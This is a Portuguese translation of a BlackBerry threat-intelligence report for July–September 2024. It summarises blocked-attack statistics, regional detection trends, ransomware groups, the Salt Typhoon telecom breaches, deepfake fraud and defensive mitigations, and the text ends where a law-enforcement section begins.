Relatório de inteligência sobre ameaças globais

Edição de janeiro de 2025

Período do relatório: 1º de julho a 30 de setembro de 2024

Inteligência acionável que importa

Este relatório fornece uma análise abrangente do cenário global de ameaças, com foco no fornecimento de inteligência acionável que os líderes podem usar para proteger suas organizações de forma proativa. Este relatório abrange de julho a setembro de 2024.

As soluções de segurança cibernética da BlackBerry® bloquearam quase um milhão de ataques contra clientes dos EUA, identificando 80.000 assinaturas maliciosas exclusivas e impedindo 430.000 ataques direcionados contra empresas comerciais.

Leia Cyberattacks Across the Globe (Ataques cibernéticos em todo o mundo ) para obter mais informações.

Neste trimestre, dos 600.000 ataques a infraestruturas críticas detectados, 45% tiveram como alvo instituições financeiras.

Descubra as descobertas internas e externas da nossa equipe de Inteligência sobre Ameaças Cibernéticas (CTI) na seção Infraestrutura Crítica.

Os ataques baseados no PowerShell demonstram a adaptação regional dos agentes de ameaças, mantendo técnicas globais consistentes em NALA, APAC e EMEA.

Leia como nossa análise da equipe de MDR revela a evolução dos padrões de ataque regionais e a persistência global de ameaças baseadas no PowerShell.

A seção Law Enforcement Limelight revela a evolução do ransomware em direção à guerra psicológica direcionada, incluindo dados exfiltrados cada vez mais armados para causar danos à reputação e alavancagem estratégica, em vez de apenas ganho financeiro.

Leia mais sobre a epidemia de ransomware que atinge o Canadá.

 

O RansomHub agora hospeda os principais afiliados, incluindo LockBit e ALPHV, responsáveis pela maioria das operações de ransomware detectadas no terceiro trimestre de 2024.

Leia mais em Threat Actors and Tooling (Agentes de ameaça e ferramentas).

O novo grupo de ransomware Lynx emprega táticas agressivas de dupla extorsão (combinando roubo de dados com criptografia) e está se expandindo da América do Norte e da Austrália para os mercados europeus.

Leia nossa seção Ameaças predominantes para saber mais sobre as tendências de ameaças em todos os principais sistemas operacionais.

Fornecemos uma lista de protocolos de segurança aprimorados e contramedidas para lidar com a evolução das táticas de ransomware, com ênfase na redução da exposição e na segurança da comunicação.

Veja a lista nas Estratégias de Mitigação de Riscos.

Encontre estratégias detalhadas de atenuação em resposta a Salt Typhoon violações, com foco na proteção da infraestrutura crítica de comunicações.

Explore estratégias de defesa para proteger a infraestrutura de comunicações essenciais.

Índice

O BlackBerry® Global Threat Intelligence Report fornece insights críticos para CISOs e tomadores de decisão, concentrando-se nas mais recentes ameaças e desafios de segurança cibernética relevantes para seus setores e regiões específicos.

Em 2024, vários fatores moldaram o cenário de ameaças à segurança cibernética. As principais eleições em todo o mundo, os conflitos em andamento e as tensões geopolíticas sobre várias questões polêmicas criaram um ambiente volátil. Essa turbulência deu poder a agentes mal-intencionados e grupos de ameaças cibernéticas em todo o mundo. Essas entidades exploram a incerteza e a agitação para obter lucro financeiro, realizar ciberespionagem, causar danos ou ampliar o caos.

Ataques cibernéticos em todo o mundo

Desempenho de segurança cibernética orientado por IA da BlackBerry

Durante o período de três meses, de julho a setembro de 2024, as soluções de segurança cibernética orientadas por IA da BlackBerry protegeram uma ampla variedade de clientes em todo o mundo. Nossa tecnologia de segurança impediu quase dois milhões de ataques cibernéticos e registrou mais de 3.000 hashes maliciosos exclusivos diariamente direcionados aos nossos clientes.

Os Estados Unidos enfrentaram o maior volume de ataques cibernéticos neste trimestre, muito mais do que qualquer outro país. A tecnologia de segurança cibernética da BlackBerry bloqueou quase um milhão de ataques contra clientes americanos, sendo que aproximadamente 80.000 envolveram o uso de hashes maliciosos exclusivos.

A BlackBerry rastreia o número de hashes maliciosos exclusivos usados nesses ataques, em comparação com o número total de ataques. Muitas vezes, malwares de commodity ou "prontos para uso" são reutilizados em ataques de grande escala, fazendo com que o mesmo binário seja identificado várias vezes.

O malware exclusivo ou novo é normalmente empregado em ataques altamente direcionados. Nesse caso, os agentes de ameaças investem tempo e esforço consideráveis para criar um novo malware com atributos específicos, com o objetivo de comprometer um determinado setor, organização ou alvo de alto valor (HVT) por meio de ataques aparentemente pequenos, mas de grande impacto. Os clientes da BlackBerry na região da América do Norte e América Latina (NALA) registraram o maior número de tentativas de ataques (ou seja, ataques interrompidos pelas soluções de segurança cibernética da BlackBerry) e o maior número de hashes exclusivos. A APAC (Ásia e Pacífico) ficou em segundo lugar e a EMEA (Europa, Oriente Médio e África) em terceiro.

Figura 1: Ataques interrompidos vs. hashes exclusivos por região de julho a setembro de 2024.
Figura 1: Ataques interrompidos vs. hashes exclusivos por região de julho a setembro de 2024.

Durante esse período, a análise da equipe do BlackBerry Managed Detection and Response (MDR) revelou padrões regionais distintos na atividade de ameaças. Os ataques baseados em PowerShell surgiram como uma ameaça global consistente, com a execução codificada em Base64 aparecendo entre as cinco principais detecções em todas as regiões - em primeiro lugar na NALA, em quinto na APAC e em terceiro na EMEA.

Cada região também apresentou características únicas de ameaça:

  • A NALA registrou grandes volumes de abuso de ferramentas de sistema, com ferramentas Sysinternals renomeadas e shells LOLBAS (Living Off the Land Binaries and Scripts) entre as principais preocupações.
  • A APAC enfrentou tentativas significativas de roubo de credenciais e evasão de defesa, tendo como alvo o Windows Defender em particular.
  • A EMEA mostrou diversos padrões de ataque, desde comandos de download do PowerShell até a manipulação de contas de usuários.

Essa variação regional nos padrões de ataques cibernéticos sugere que os agentes de ameaças estão adaptando suas abordagens com base em fatores regionais, ao mesmo tempo em que mantêm algumas técnicas consistentes globalmente.

Figura 2: Os cinco principais alertas do site CylanceMDR por região.

NALA

1º: Execução suspeita do PowerShell codificado em Base64
2º: Possível ferramenta Sysinternals renomeada foi executada
3º: Os serviços lançaram um shell LOLBAS
4º: Execução de ferramentas de acesso remoto
5º: Execução de comando de download do PowerShell

APAC

1º: Possível roubo de credenciais do Windows
2ª: A tarefa de programação Svchost inicia o Rundll32
3º: Violação do Windows Defender via PowerShell
4º: Possível abuso do Msiexec via carregamento de DLL
5º: Execução suspeita de PowerShell codificado em Base64

EMEA

1º: Execução do comando de download do PowerShell
2º: Possível abuso da linha de comando stdout
3º: Execução suspeita de PowerShell codificado em Base64
4ª: Criação de conta de usuário por meio do Net Local Group Add
5º: A tarefa de agendamento do Svchost inicia o Rundll32

Análise geopolítica e comentários

Já se passou mais de uma década desde que Leon Panetta, então Secretário de Defesa dos EUA, alertou sobre a possibilidade de um "Pearl Harbor cibernético", destacando a perspectiva de um ataque cibernético devastador à infraestrutura essencial dos EUA que se espalharia em cascata pelo mundo ciberfísico. Embora sua terrível advertência ainda não tenha se concretizado, nossa dependência de tecnologias digitais que são vulneráveis a ataques, exploração e manipulação aumentou. Alguns caracterizaram a situação difícil que nossas sociedades digitalizadas enfrentam como uma "barganha diabólica" que comprometeu a segurança em prol do crescimento econômico, do aumento da produtividade e da conveniência.

Há dez anos, havia apenas um punhado de agentes, principalmente estatais, capazes de realizar ataques cibernéticos sofisticados. Hoje, há centenas de agentes estatais e não estatais. A mais recente Avaliação Nacional de Ameaças Cibernéticas do governo canadense, juntamente com as avaliações de ameaças cibernéticas de outros países aliados, como o Reino Unido, caracterizam o estado da insegurança cibernética como cada vez mais imprevisível, com um elenco crescente de agentes de ameaças agressivos que estão adotando novas tecnologias e táticas para melhorar e ampliar suas atividades maliciosas.

O impacto dessa proliferação é generalizado. De acordo com a Global Anti-Scam Alliance, estima-se que 25,5% da população mundial foi afetada por fraudes cibernéticas em 2023. No Reino Unido, mais de 70% das empresas de médio e grande porte e quase 66% das instituições beneficentes de alta renda sofreram algum tipo de violação de segurança cibernética. No Canadá, mais de dois terços (70%) dos canadenses sofreram um incidente de segurança cibernética no ano passado. A própria análise da BlackBerry confirma essas tendências e destaca o aumento dos ataques cibernéticos contra infraestruturas críticas.

O ransomware é amplamente considerado como a forma mais perturbadora de crime cibernético e há um medo crescente de que "o ransomware possa paralisar países, não apenas empresas".Na verdade, os ataques de ransomware à infraestrutura essencial, como o setor de saúde, aumentaram significativamente. Nos Estados Unidos, o Departamento de Saúde e Serviços Humanos relatou um aumento de 278% em grandes violações de dados envolvendo ransomware em hospitais entre 2018 e 2022. E, à medida que o número de ataques de ransomware se prolifera, o mesmo acontece com a variedade de táticas e técnicas usadas pelos agentes de ransomware. Os grupos de ransomware agora empregam estratégias de extorsão multifacetadas que envolvem a exfiltração e a criptografia dos dados das vítimas, além de manterem sites de vazamento de dados na dark web, onde são publicados os dados roubados das vítimas que não estão em conformidade. A rede da criminalidade está se tornando cada vez mais complexa.

O desafio não é apenas técnico. A realidade alarmante é que as operações de crimes cibernéticos estão tendo um impacto negativo no bem-estar humano. Os pesquisadores documentaram um aumento de 35% a 41% na mortalidade hospitalar após um ataque de ransomware a um hospital. Outros estudos destacaram como os ataques de ransomware têm um efeito cascata nos departamentos de emergência adjacentes, causando interrupções operacionais significativas e impactando negativamente a chegada de ambulâncias, os tempos de espera para tratamento e o atendimento ao paciente.

Outra tendência alarmante foi o surgimento de um setor de tráfico humano relacionado ao crime cibernético. As Nações Unidas documentaram aproximadamente 220.000 pessoas traficadas para operações de crimes cibernéticos no sudeste da Ásia em 2023. Esses indivíduos enfrentam ameaças às suas vidas e são submetidos à tortura e a tratamentos ou punições cruéis, desumanos e degradantes, detenção arbitrária, violência sexual, trabalho forçado e outras formas de exploração. Grupos do crime organizado realizam essas operações fora do Camboja há mais de uma década e, desde então, expandiram-se para outros países, como Mianmar, Tailândia, Laos e Filipinas. Em alguns casos, as pessoas são traficadas para esses locais de operações forçadas de crimes cibernéticos no Sudeste Asiático de lugares tão distantes quanto o Brasil e o leste da África.

À medida que as ameaças cibernéticas se proliferam, os governos e o setor estão trabalhando arduamente para interromper o ecossistema de ransomware e fortalecer nossa capacidade coletiva de deter agentes cibernéticos mal-intencionados. Em outubro de 2024, a BlackBerry e a Public Safety Canada concordaram em co-presidir o Painel Consultivo do Setor Público-Privado da Iniciativa Internacional de Combate ao Ransomware (CRI). Juntamente com os 68 estados membros da CRI, a BlackBerry trabalha para fortalecer a resiliência coletiva contra o ransomware e equipar melhor os governos de todo o mundo para combater a ameaça do ransomware e outras ameaças cibernéticas.

Figura 3: Distribuição de ataques e hashes exclusivos em infraestruturas críticas e empresas comerciais, abril a junho de 2024 vs. julho a setembro de 2024.

Cenário de ataques cibernéticos por setor

Passando de uma perspectiva global para um foco específico do setor, os analistas da BlackBerry identificaram os principais alvos dos agentes de ameaças. Para os fins deste relatório, os setores industriais estão consolidados em duas categorias principais: infraestrutura crítica e empresas comerciais.

A BlackBerry reúne telemetria e estatísticas sobre clientes de infraestrutura crítica nos 16 setores industriais definidos pela Cybersecurity and Infrastructure Security Agency (CISA). Esses setores incluem saúde, governo, energia, finanças e defesa. Empresas comerciais são aquelas que se dedicam à produção, distribuição ou venda de bens e serviços. Essas empresas operam em vários setores, como manufatura, varejo e serviços. A Figura 3 abaixo mostra a distribuição de ataques e hashes exclusivos em infraestruturas críticas e empresas comerciais.

Figura 3: Distribuição de ataques e hashes exclusivos em infraestruturas críticas e empresas comerciais, abril a junho de 2024 vs. julho a setembro de 2024.

Ameaças à infraestrutura crítica

A infraestrutura crítica pode ser um alvo potencialmente lucrativo para os criminosos cibernéticos. Os dados valiosos mantidos por esses setores são frequentemente vendidos em mercados clandestinos, usados para planejar ataques futuros ou aproveitados para espionagem. Recentemente, houve um aumento nos ataques focados em setores de infraestrutura crítica, como saúde, energia, finanças e defesa. Para as organizações desses setores, o tempo de inatividade é caro. Elas estão mais propensas a pagar um resgate para restaurar os sistemas rapidamente devido às possíveis perdas que elas e seus clientes podem sofrer com o tempo de inatividade e a falta de acesso a dados essenciais.

Com mais serviços sendo digitalizados e mais sistemas do que nunca conectados à Internet, as organizações desses setores frequentemente se encontram na mira dos criminosos cibernéticos. Esses grupos criminosos variam de hackers novatos que buscam o reconhecimento de seus pares a agentes de ameaças organizadas de estados-nação e grupos de ransomware estabelecidos que buscam infligir o caos a seus inimigos. O impacto desses ataques pode ser devastador, afetando a segurança nacional e interrompendo operações essenciais, além de colocar em risco a estabilidade econômica e até mesmo vidas humanas.

As soluções de segurança cibernética da BlackBerry, incluindo CylanceENDPOINT™, impediram quase 600.000 ataques a infraestruturas críticas neste trimestre, sendo que 45% desses ataques tiveram como alvo o setor financeiro. O setor financeiro continua a ser um alvo popular para os atacantes cibernéticos.

Figura 4: Detalhamento de ataques e hashes exclusivos por setores de infraestrutura crítica.
Figura 4: Detalhamento de ataques e hashes exclusivos por setores de infraestrutura crítica.
Na próxima seção, examinaremos mais de perto algumas das ameaças mais comuns à infraestrutura crítica que encontramos neste trimestre. A primeira parte lista os tipos de ameaças que a BlackBerry mais comumente identifica e contra as quais se protege em sua base de clientes. A segunda parte abrange as ameaças relatadas por terceiros, como publicações de notícias do setor, fornecedores de segurança ou agências governamentais.
Figura 5: Distribuição de ameaças internas ao BlackBerry em infraestruturas críticas neste trimestre.

Ameaças a empresas comerciais

O setor de empresas comerciais, abrangendo setores como bens de capital, varejo e comércio atacadista, é o principal alvo de ataques cibernéticos sofisticados. Violações bem-sucedidas podem levar a redes comprometidas, perda de dados, interrupções operacionais, danos à reputação e custos financeiros significativos.

Neste trimestre, as soluções de segurança cibernética da BlackBerry impediram mais de 430.000 ataques direcionados contra empresas comerciais. O gráfico abaixo ilustra os setores que receberam o maior volume de tentativas de ataques e hashes de malware exclusivos.

Figura 6: Distribuição de ataques bloqueados e hashes exclusivos em setores de empresas comerciais.
Figura 6: Distribuição de ataques bloqueados e hashes exclusivos em setores de empresas comerciais.
Figura 7: Principais ameaças internas contra empresas comerciais de julho a setembro de 2024.
Figura 7: Principais ameaças internas contra empresas comerciais de julho a setembro de 2024.

Segurança das comunicações: Ameaças e mitigações

Devido ao seu uso quase universal, a moderna infraestrutura de telecomunicações enfrenta agora uma variedade sem precedentes de ameaças sofisticadas que visam suas operações e fluxos de dados fundamentais. Desde agentes de estados-nação que realizam espionagem em larga escala até empresas criminosas cibernéticas que oferecem "interceptação como serviço", essas ameaças exploram as compensações inerentes entre conectividade global e segurança nas redes públicas de telecomunicações de cada país.

Como as organizações dependem cada vez mais de comunicações móveis e digitais para operações confidenciais, as brechas de segurança nessas redes se tornaram vulnerabilidades críticas que podem expor vantagens competitivas, planos estratégicos e informações confidenciais. A recente cascata de violações de provedores de telecomunicações demonstra que nenhuma organização pode presumir que suas comunicações estão seguras simplesmente porque estão usando serviços de operadoras padrão.

No início deste trimestre, a AT&T divulgou uma grande violação de segurança na qual agentes de ameaças comprometeram os registros de chamadas e mensagens de texto de seus clientes de celular durante um longo período; agora sabemos que várias organizações de telecomunicações foram infiltradas. Alguns líderes norte-americanos chamaram essa violação de "a pior violação de telecomunicações da história do nosso país". A violação da AT&T foi altamente significativa porque afetou não apenas os assinantes da AT&T, mas também qualquer pessoa em todo o mundo que tenha se comunicado com um cliente da AT&T durante o período afetado. Os dados comprometidos incluíam metadados potencialmente valiosos sobre padrões de comunicação, tempo de chamadas e relacionamentos entre usuários.

Nesta seção, exploraremos os vários tipos de entidades que estão ameaçando a infraestrutura de comunicações, as táticas que elas usam e as atenuações que as organizações podem adotar para proteger seus dados.

 

Atores de ameaça

Os agentes de estado-nação representam uma ameaça significativa à segurança internacional das telecomunicações, conforme evidenciado por eventos recentes em que atacantes ligados ao governo chinês realizaram uma ampla campanha de espionagem cibernética. Esses agentes sofisticados visaram as principais empresas de telecomunicações para acessar dados de telefones celulares de figuras importantes, incluindo candidatos à presidência dos EUA.

As autoridades do governo dos EUA acreditam que um agente de ameaças conhecido como Salt Typhoon, intimamente ligado ao Ministério de Segurança do Estado da China, é o culpado por trás da campanha de infiltração de telecomunicações. Suas operações afetaram várias operadoras importantes, incluindo Verizon, AT&T e T-Mobile, e os investigadores descobriram que eles permaneceram sem serem detectados nessas redes por mais de um ano.

As entidades criminosas evoluíram ao longo do tempo para fornecer serviços de ataque altamente especializados no setor de telecomunicações. Isso inclui organizações que oferecem "interceptação de chamadas como serviço" e operam plataformas de "interceptação telefônica como serviço" com serviços prontamente disponíveis para compra na Internet. Alguns agentes de ameaças desenvolveram recursos para redirecionar e interceptar conexões de celular para qualquer número de telefone sem o conhecimento do usuário final.

O setor de telecomunicações também enfrenta ameaças de adversários que buscam obter vantagens por meio da exploração das comunicações. Esses agentes têm como alvo indivíduos e organizações de alto nível, usando dados interceptados para tentativas de chantagem ou para expor relacionamentos confidenciais a fim de minar a confiança pública no indivíduo visado. Uma preocupação especial é a capacidade de identificar e, possivelmente, expor apoiadores de alto nível de candidatos políticos que tentam permanecer fora da vista do público ou indivíduos cuja segurança física depende de seu anonimato, como jornalistas, repórteres e ativistas políticos.

Ameaças identificadas

As vulnerabilidades inerentes às redes de telecomunicações podem expor as organizações a uma complexa rede de ameaças interconectadas. Embora as redes públicas de telecomunicações sejam excelentes em termos de alcance global, essa acessibilidade vem acompanhada de compensações de segurança que os agentes mal-intencionados podem explorar (e frequentemente exploram).

Da interceptação direta de comunicações à sofisticada análise de metadados, essas ameaças têm como alvo não apenas o conteúdo das comunicações, mas também os padrões e relacionamentos que elas revelam. As recentes violações dos principais provedores de telecomunicações demonstraram que essas ameaças não são meramente teóricas, mas representam riscos ativos à confidencialidade entre empregador e empregado, à vantagem competitiva e até mesmo à segurança nacional. Alguns desses riscos incluem:

Interceptação de comunicações: Os agentes de ameaças podem interceptar chamadas de áudio/vídeo e mensagens SMS, o que lhes permite espionar as comunicações em tempo real. Muitos dos riscos que essas vulnerabilidades apresentam para a telefonia padrão também existem nos aplicativos gratuitos usados para chamadas de voz e mensagens.

Exploração de metadados: Com a exploração de metadados, os agentes de ameaças coletam e analisam os registros de detalhes de chamadas (CDR) e os registros de detalhes de mensagens (MDR). Esses dados permitem que eles criem mapas detalhados das relações de contato e analisem os padrões de comunicação, incluindo frequência, hora do dia e duração da chamada. A visibilidade em tempo real desses metadados permite que os agentes de ameaças rastreiem os assinantes de telecomunicações individuais e identifiquem padrões de comunicação exploráveis.

O vice-presidente de Pesquisa e Inteligência de Ameaças da BlackBerry, Ismael Valenzuela, explica: "Os metadados de telecomunicações podem ser uma mina de ouro para os criminosos cibernéticos. Mesmo que o conteúdo de chamadas e textos não seja vazado, o conhecimento do contexto por trás dessas chamadas, como para quem uma pessoa liga, com que frequência e quando, pode ser facilmente transformado em uma arma. Os agentes de ameaças podem descobrir aproximadamente onde você mora, onde trabalha, com quem fala com mais frequência e até mesmo se você liga para números potencialmente confidenciais, como prestadores de serviços de saúde."

Ataques baseados em identidade: A falta de validação de identidade em redes públicas torna a falsificação de identidade e de número de telefone endêmica e quase impossível de ser evitada. Os agentes de ameaças podem usar metadados roubados para atingir especificamente os assinantes de telecomunicações, falsificando os números com os quais eles já estão se comunicando. Aqueles que atenderem provavelmente serão submetidos a chamadas robóticas, mas, em alguns casos, os invasores podem usar novas tecnologias, como geradores de voz profunda, para criar fraudes complexas de identidade.

A clonagem da voz de uma pessoa real usando IA generativa é conhecida como deepfake de áudio . Esses tipos de ataques estão ganhando força rapidamente no mundo corporativo, pois os invasores literalmente dependem de que os funcionários confiem na voz de alguém que conhecem - como seu chefe - e abusem dessa confiança para perpetuar golpes financeiros de alto valor.

Vulnerabilidades da infraestrutura: A moderna infraestrutura de telecomunicações contém desafios particularmente difíceis. As correções geralmente exigem a substituição total dos componentes do sistema, o que pode causar interrupções no serviço e exigir investimentos significativos dos provedores de telecomunicações.

  • Componentes de sistemas legados: Partes essenciais do backbone de telecomunicações ainda são executadas em sistemas das décadas de 1970 e 1980 que antecedem as proteções modernas de segurança cibernética e foram projetadas principalmente para operações de linha fixa. Para atualizar esses componentes antigos e alinhá-los às medidas de segurança atuais, eles precisariam ser reforçados com o roteamento das comunicações por meio de redes de retransmissão seguras e com a implementação de criptografia de ponta a ponta que proteja tanto o conteúdo dos dados quanto seus padrões de transmissão.
  • Pontos de acesso à rede: Os protocolos de interconexão de operadoras de roaming celular contêm pontos fracos inerentes que permitem que agentes mal-intencionados redirecionem e interceptem conexões celulares. Essa vulnerabilidade existe em todas as principais operadoras, incluindo AT&T, Verizon e T-Mobile, conforme demonstrado pela exploração bem-sucedida de nós de rede em vários provedores pelo siteSalt Typhoon.
  • Sistemas de autenticação: Os controles básicos de segurança, como a autenticação multifator, estão notavelmente ausentes em alguns componentes essenciais da infraestrutura de telecomunicações. Essa lacuna permite que os agentes de ameaças mantenham o acesso persistente depois de obterem a entrada inicial.
  • Sistemas de monitoramento: A infraestrutura de "interceptação legal", projetada para operações de vigilância legal, pode ser comprometida para revelar dados operacionais confidenciais sobre investigações em andamento e alvos de vigilância.
  • Pontos de trânsito de dados: As interconexões entre os provedores de serviços de Internet e as redes de telecomunicações criam pontos de vulnerabilidade adicionais onde e-mails não criptografados e outras comunicações podem ser interceptados.
  • Infraestrutura de roteamento global: O projeto fundamental das redes de telecomunicações prioriza a conectividade global em detrimento da segurança, criando vulnerabilidades inerentes à forma como as chamadas e os dados são roteados entre os provedores e entre as regiões.

Coleta de inteligência: As violações de telecomunicações ajudam muito os agentes de ameaças em seus recursos de coleta de inteligência. Os agentes de ameaças podem usar informações vazadas para realizar vigilância em tempo real de assinantes específicos e, em alguns casos, identificar relacionamentos ocultos. No contexto de campanhas políticas, essa vigilância permite que eles descubram apoiadores de alto nível que tentam manter a privacidade e expor conexões confidenciais. Essa inteligência pode revelar padrões de comunicação adicionais que também podem ser explorados de maneiras inesperadas.

"Você pode achar que não tem nada que um invasor possa querer", acrescenta Valenzuela, "mas o simples fato de saber para quem você liga com mais frequência e em quem é mais provável que você confie e, portanto, atenda a uma ligação, torna mais fácil para os criminosos cibernéticos perpetuarem qualquer um dos inúmeros golpes baseados em telefone, incluindo aqueles que dependem de áudio falso para falsificar a voz de uma pessoa que você conhece".

Ameaças secundárias: A exploração das vulnerabilidades das telecomunicações pode levar a ameaças secundárias. Entre elas estão as tentativas de chantagem, principalmente quando relacionamentos confidenciais são expostos. Além disso, as informações comprometidas podem ser usadas para coleta de inteligência competitiva e espionagem. Se uma pessoa, entidade ou organização de alto nível for comprometida, isso pode até mesmo afetar os processos democráticos e ameaçar a segurança nacional.

De acordo com David Wiseman, vice-presidente da BlackBerry SecuSUITE®"Os segredos que proporcionam vantagens competitivas - seja no mercado ou no campo de batalha - são vulneráveis à exposição. As redes públicas de telecomunicações são projetadas principalmente para acessibilidade, o que geralmente leva a comprometimentos de segurança."

Um problema significativo com as redes públicas, incluindo as plataformas de mensagens criptografadas, é sua natureza aberta, permitindo que praticamente qualquer pessoa participe. Wiseman explica: "Em plataformas como Signal ou WhatsApp, os usuários se autorregistram, o que contribui para problemas como falsificação de identidade, fraude e preocupações com deepfakes. Sistemas abertos com autorregistro são inerentemente de alto risco."

Mitigações

Para combater o cenário em evolução das ameaças às telecomunicações, as organizações precisam implementar medidas de segurança abrangentes que vão além da criptografia básica. Embora as ferramentas de comunicação de nível de consumidor ofereçam alguma medida de proteção, elas não conseguem lidar com ataques sofisticados que visam tanto o conteúdo das mensagens quanto os metadados.

Uma defesa eficaz requer uma abordagem em várias camadas que combine soluções tecnológicas com protocolos estratégicos e vigilância humana. As estratégias a seguir fornecem uma estrutura para que as organizações protejam suas comunicações confidenciais contra agentes de estados-nação, entidades criminosas e outros agentes de ameaças que buscam explorar as vulnerabilidades das telecomunicações.

Autenticação e verificação de identidade: A autenticação multifatorial (MFA) e os protocolos de verificação de identidade funcionam como defesas de primeira linha essenciais contra acesso não autorizado e ataques de engenharia social.

  • Tática: Implemente sistemas de autenticação robustos e treine os usuários para verificar comunicações inesperadas por meio de canais alternativos ou secundários.
  • Exemplo: Quando um executivo recebe uma mensagem urgente de um membro do conselho fora do horário normal fazendo uma solicitação incomum, ele segue o protocolo verificando por meio de um canal de comunicação pré-estabelecido separado.

Segurança de links e mensagens: Os ataques de engenharia social exploram a confiança em números de telefone conhecidos e fontes de mensagens para distribuir conteúdo malicioso.

  • Tática: Estabelecer protocolos rigorosos para o manuseio de links e implementar sistemas que examinem e verifiquem o conteúdo das mensagens antes da entrega.
  • Exemplo: Uma instituição bancária implementa uma política de não clicar em links externos, exigindo que todas as comunicações importantes ocorram em sua própria plataforma segura.

Controle de infraestrutura: As organizações precisam de uma supervisão completa de seus canais de comunicação para evitar o acesso não autorizado e manter os padrões de segurança.

  • Tática: Implantar sistemas de comunicação em que a organização mantenha controle total sobre a infraestrutura, a autorização do usuário e os protocolos de segurança.
  • Exemplo: Uma empresa de defesa implementa um sistema de comunicação de circuito fechado em que todos os usuários devem ser pré-autorizados e todas as comunicações são encaminhadas por meio de canais seguros e monitorados.

Proteção de metadados: Os padrões de comunicação e os metadados podem revelar informações confidenciais, mesmo quando o conteúdo da mensagem é seguro.

  • Tática: criptografar e encapsular todos os metadados, incluindo informações do chamador, duração da comunicação e padrões de relacionamento entre usuários.
  • Exemplo: Uma instituição financeira impede que os concorrentes mapeiem suas discussões sobre fusões criptografando não apenas as comunicações, mas também os padrões de quais executivos estão se comunicando entre si.

Aprimoramento da segurança móvel: As comunicações móveis apresentam desafios de segurança exclusivos que exigem soluções criptográficas especializadas.

  • Tática: Implemente autenticações criptográficas certificadas para todas as comunicações móveis para evitar falsificação de chamadas, fraude e acesso não autorizado.
  • Exemplo: Uma agência governamental implementa dispositivos móveis com autenticação criptográfica integrada, garantindo que todas as comunicações sejam verificadas e seguras, independentemente do local.

Controle do ciclo de vida dos dados: Os sistemas de comunicação tradicionais abrem mão do controle dos dados depois de compartilhados, criando vulnerabilidades de segurança permanentes.

  • Tática: manter a propriedade organizacional de todos os dados compartilhados com a capacidade de revogar o acesso ou excluir o conteúdo a qualquer momento.
  • Exemplo: Quando um executivo deixa uma empresa da Fortune 100, a organização revoga imediatamente o acesso a todos os documentos e comunicações compartilhados anteriormente.

Defesa de engenharia social: o comportamento humano básico geralmente apresenta a maior vulnerabilidade de segurança em sistemas de comunicação.

  • Tática: Implemente programas de treinamento abrangentes apoiados por sistemas automatizados para detectar e evitar tentativas de engenharia social.
  • Exemplo: A plataforma de comunicação segura de uma organização sinaliza automaticamente e exige verificação adicional para quaisquer padrões ou solicitações de comunicação incomuns.

Integração da avaliação de riscos: As medidas de segurança devem ser adaptadas aos riscos organizacionais específicos e aos requisitos regulamentares.

  • Tática: Avalie regularmente os riscos de segurança da comunicação e ajuste os protocolos com base nas ameaças emergentes e nas necessidades de conformidade.
  • Exemplo: Um provedor de serviços de saúde realiza avaliações trimestrais de suas medidas de segurança de comunicação, atualizando os protocolos com base em novas informações sobre ameaças e alterações normativas.

Integração holística da segurança: A segurança da comunicação deve ser integrada a uma estratégia mais ampla de segurança cibernética.

  • Tática: garantir que as comunicações seguras funcionem em conjunto com outras medidas e protocolos de segurança.
  • Exemplo: Uma empresa de manufatura integra sua plataforma de comunicação segura com seus sistemas de controle de acesso e prevenção de perda de dados, criando um ecossistema de segurança unificado.

Arquitetura de dados temporários: O armazenamento persistente de dados aumenta a vulnerabilidade a violações e ao acesso não autorizado.

  • Tática: Implemente sistemas que minimizem a persistência de dados por meio de armazenamento temporário e protocolos de eliminação automática.
  • Exemplo: A plataforma de comunicação de um escritório de advocacia exclui automaticamente as mensagens dos servidores imediatamente após a confirmação da entrega a todos os destinatários autorizados.

Leia nosso blog para saber mais sobre como os agentes de ameaças usam e abusam de metadados roubados de comunicações móveis.

Os perigos das deepfakes

O FBI divulgou recentemente um alerta sobre criminosos cibernéticos que usam IA generativa para cometer fraudes em grande escala, visando empresas comerciais e organizações financeiras com golpes elaborados. O aviso alerta sobre as ramificações de vídeos e chamadas de voz deepfake, bem como imagens de perfil geradas por IA para se passar por pessoas que podem ser usadas em golpes de contratação, como a campanha norte-coreana para se infiltrar em empresas ocidentais de TI com espiões que se fazem passar por trabalhadores remotos.

Essa superfície de ataque cibernético recém-expandida é uma ameaça muito real para empresas comerciais de todos os portes, com perdas projetadas para chegar a impressionantes US$ 40 bilhões até 2027. Como o vice-presidente sênior de engenharia de produtos e ciência de dados da BlackBerry, Shiladitya Sircar, explicou recentemente em um episódio do podcastUnsupervised Learning de Daniel Miessler, "Esse tipo de adversário de IA generativa cria novos vetores de ataque com todas essas informações multimodais que ninguém vê chegando. Ele cria um cenário de ameaças mais complexo e cheio de nuances que prioriza ataques orientados por identidade, e isso só vai melhorar."

As implicações para os negócios são profundas. Quando as partes interessadas não podem mais confiar na autenticidade das comunicações executivas, todos os aspectos das operações são afetados, desde os anúncios que movimentam o mercado até as diretrizes estratégicas internas. O setor de serviços bancários e financeiros surgiu como o principal alvo, enfrentando desafios sem precedentes para manter comunicações seguras e processos de verificação de transações. Como observa Sircar, "o aspecto mais preocupante dessas falsificações profundas é o potencial de erosão da confiança - confiança em sistemas que são legítimos, que são verdadeiros".

As organizações com visão de futuro já estão se posicionando à frente das exigências regulatórias emergentes, incluindo a Lei de Fraude sem IA dos EUA e a legislação canadense sobre mídia não consensual. Esses desenvolvimentos regulatórios sinalizam uma mudança crucial na forma como as empresas devem abordar a segurança da comunicação e a verificação de identidade.

Com o aprimoramento dos softwares de alteração de voz por IA geradora e de voz profunda, é provável que essas ferramentas sejam usadas com mais frequência em um número cada vez maior de ataques direcionados. Se quiser saber mais sobre deepfakes, incluindo as atenuações que você pode usar para ajudar a proteger sua organização, baixe nosso white paper sobre deepfakes aqui ou ouça nossa discussão completa com Shiladitya Sircar no podcast Unsupervised Learning.

Se você acredita ter sido vítima de um esquema de fraude deepfake, pode registrar uma denúncia no Internet Crime Complaint Center do FBI em www.ic3.gov.

Limelight da aplicação da lei

A BlackBerry trabalha com agências de aplicação da lei em todo o mundo para melhorar a colaboração público-privada em segurança cibernética. A partir do Global Threat Intelligence Report de setembro de 2024, a BlackBerry começou a colaborar com o National Cybercrime Coordination Centre (NC3) da Royal Canadian Mounted Police para compartilhar inteligência. As informações a seguir foram fornecidas pelo NC3 para destacar as tendências do crime cibernético do ponto de vista da aplicação da lei.
Limelight da aplicação da lei

Contexto histórico: O surgimento dos grupos de ransomware

